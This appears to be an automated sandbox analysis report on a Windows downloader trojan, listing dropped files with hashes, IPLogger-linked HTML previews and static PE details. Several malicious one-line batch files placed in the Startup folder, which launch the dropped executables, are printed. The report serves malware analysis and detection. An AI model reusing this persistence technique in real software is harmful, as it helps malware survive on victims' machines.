Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulnmWllZ:NllUmWl
MD5:	3EBBEC2F920D055DAC842B4FF84448FA
SHA1:	52D2AD86C481FAED6187FC7E6655C5BD646CA663
SHA-256:	32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
SHA-512:	163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hjnyt00.0xn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dsovqtg.oie.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l31rh34q.ild.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwvgjly.hoh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\cl3vhpdkLtmoLXWJKBugbJDP.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\AppData\Local\eTNltv0LYVQnDdBl6tKVEYLr.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\AppData\Local\oqEo8V5wvVLKNc2VytL8EAsq.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\AppData\Local\sOj9v5fBDMPcMK0zpX2B6CYH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HmybwgSSguRbNIGR4y7xNho1.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.9352881543647955
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5GJUNyZ9y2XHH:fE1N723GxPH
MD5:	AD70449709C5E5934858170CAB41F089
SHA1:	F5DC4664A8EB26AE85302B4A549AF16E5FCEFB72
SHA-256:	FB1C5FBCFEF2C4075843C7D27CE3AD9EAC709C6C63A89A395A6D6A895295597F
SHA-512:	E1E05D2F3D9D1A76570F40CC591F05B601DD476163CEB56DE91556B7BCBBBBA3F44EC0C4FDE6179C073345F41C3C85D3B55F309B2C85E042D940F3D673CC1B3D
Malicious:	true
Preview:	start "" "C:\Users\user\AppData\Local\cl3vhpdkLtmoLXWJKBugbJDP.exe"

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBBVbA3zq6R2KekyMmBCsddO.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.799852738746559
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5AxrJlhvTPls:fE1N723AtJLTG
MD5:	2139EC5998BE95B974D08BAF7F4D0ACC
SHA1:	7741D7160DC48487B14BB366B0F1311276C1F1A0
SHA-256:	FFD74F4C2B22153C19CC402121B4987685528AB6B78F58E188E91848D6526490
SHA-512:	B3E2F609D4815BCF8266DA35202EDC7C5B7FD519B99611D606F08A363903FCE945808909A517820ADE5C4F8BC8534F5B9C0CC69A598A715FDCD3583BC4EF08E1
Malicious:	true
Preview:	start "" "C:\Users\user\AppData\Local\eTNltv0LYVQnDdBl6tKVEYLr.exe"

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	5.029106036339288
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5WlcuafXXNLvn:fE1N723WBafXXNLv
MD5:	E9EF602ADF63FC73FDDB36F792B3AD37
SHA1:	0D11A1FB93DACEE9B45F218CBA7655B690547651
SHA-256:	60E0EA068D25EB2798B39ABB9635B1376D1095FDBE2984D9AC2A73C8B5F1CF82
SHA-512:	EE7C7310264BB8222BDB3BF1302E96FC506EFEE0EF1A581D41A534786CD396261FF2C4BB35B9C0DFFEEDEFA235B02ED328E8A1B423C02A1519C4B786F38B340B
Malicious:	true
Preview:	start "" "C:\Users\user\AppData\Local\sOj9v5fBDMPcMK0zpX2B6CYH.exe"

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q0yFl4HZQFpr4zRkESdCNqpF.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.824177043253686
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5KUpHxwdAzsn:fE1N723KUtxwdSs
MD5:	60E6880E740F3F976F62D794BE965633
SHA1:	B8CFFA5D690FA72A06082D639208D10F6199731A
SHA-256:	46687767783549BCEA4CEB412A55387E9EF2F202AA24C66F5BA76511DE2A0DB7
SHA-512:	B677429756DA877ED139BAC9DF1966C676D2D8B86E838B70E18248B7392860019BAA8AD7D5188DCED6AA2CD86B05040294544D8C67BA1D32EFE33D443AD0919D
Malicious:	true
Preview:	start "" "C:\Users\user\AppData\Local\oqEo8V5wvVLKNc2VytL8EAsq.exe"

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.938964022510495
Encrypted:	false
SSDEEP:	3:Ljn9m1N+E2J5jNtTxrDOUwln:fE1N723NJwl
MD5:	17F19672DDF882B8AEE85FD6D715F2C1
SHA1:	79FA9C01138484DC607F843B78CB667420F9722E
SHA-256:	3F66881C0CC3C93A97F193157746581E0003B59F115390959F97BC843BA8BB92
SHA-512:	F23377B3CBDA039C7B21C9D11710D93FC2EDCAE09A90387452DAF33BA97D94DA3BF662CE02EA12AB373BC16A050C94DCC89F3DF83E2B2A64DD5ED279F35FD4C2
Malicious:	true
Preview:	start "" "C:\Users\user\AppData\Local\FMT2OeifGUTNfkZyqLG0jeEO.exe"

C:\Users\user\Pictures\OpxuPHiFHgdrtftYca7HLIbc.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\Pictures\RrubXdXqzbveJvxl1Tifb4PD.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\Pictures\UzLdRf9lIFGRsFA8wLSHgzsn.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\Pictures\Zu7wa3hTioo41CyobTIbG45C.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Users\user\Pictures\d6stDH4n7YYIgzL0Ov3IxLa8.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7462
Entropy (8bit):	5.420482116403958
Encrypted:	false
SSDEEP:	192:5LP+u+v13xV1cSHYu+zogDLIIUObDz5p7KoxSR1yz:5D+hv13T1FH0fHIIPD9xKu
MD5:	77F762F953163D7639DFF697104E1470
SHA1:	ADE9FFF9FFC2D587D50C636C28E4CD8DD99548D3
SHA-256:	D9E15BB8027FF52D6D8D4E294C0D690F4BBF9EF3ABC6001F69DCF08896FBD4EA
SHA-512:	D9041D02AACA5F06A0F82111486DF1D58DF3BE7F42778C127CCC53B2E1804C57B42B263CC607D70E5240518280C7078E066C07DEC2EA32EC13FB86AA0D4CB499
Malicious:	false
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="" />..<meta property="og:description" content="" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="og:url" content="https://yip.su/R

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4659261291476335
Encrypted:	false
SSDEEP:	6144:jzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:fZHtBZWOKnMM6bFpZj4
MD5:	CC042D9FBD203B8AB06E57796C2EB5B6
SHA1:	BAB2B5729A3A31F0E5F5148A5DACCF151E782E66
SHA-256:	49BE6627FF8E3384D88855B21C8BA8983445D2B56E72012F3EB927DE96BE5A80
SHA-512:	FED5D4DD8932B052FCDBDBE41B39E39C8A428C5484C281860BE30456A4862D7D7181476DBA7B5AB0DE1FC0B00480E8D343D4B2DD8027D8F69882483E0DDCBC45
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmnF.rm..................................................................................................................................................................................................................................................................................................................................................F........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.922629358941945
TrID:	Win64 Executable GUI Net Framework (217006/5) 45.39% Win64 Executable GUI (202006/5) 42.25% InstallShield setup (43055/19) 9.01% Win64 Executable (generic) (12005/4) 2.51% Generic Win/DOS Executable (2004/3) 0.42%
File name:	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe
File size:	2'274'400 bytes
MD5:	ec3afdbd761916a682e9372834365939
SHA1:	35e3b8bc572d9ceadb2d519c4013fcf3632da802
SHA256:	6e4422d8d101bf53165220c1fce47839b23a41057420d070fb909979415553f8
SHA512:	1d5debda8b3a48c66845692fffb5fbcc9224e48fca6dc549661b1d583d88706660894fc380fc731c00c82c0bc276ee9f68cf00fab6613f510fbc3e837012f3cd
SSDEEP:	49152:tI/0Xh92X3FAOkoQgcK11eVBOHpwIf0bOtW1sLjS5gd:WO2X33DVp98bObLwK
TLSH:	1EB5BF15D3E802A5E47BC630CA699733C7B1B85A2734D68B0659D6862FB3ED14B3F312
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...dm.Kdm.Kdm.K...Jmm.K...Jhm.K...JJm.Km.*Kjm.K/..Jmm.Kdm.K.m.K...Jom.K...J m.Kdm.Kem.Kw..Jem.Kw.FKem.Kw..Jem.K...............

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140068f38
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66C0B63E [Sat Aug 17 14:39:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	9e02808def02e999c496dcaa4fcfd6ba

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
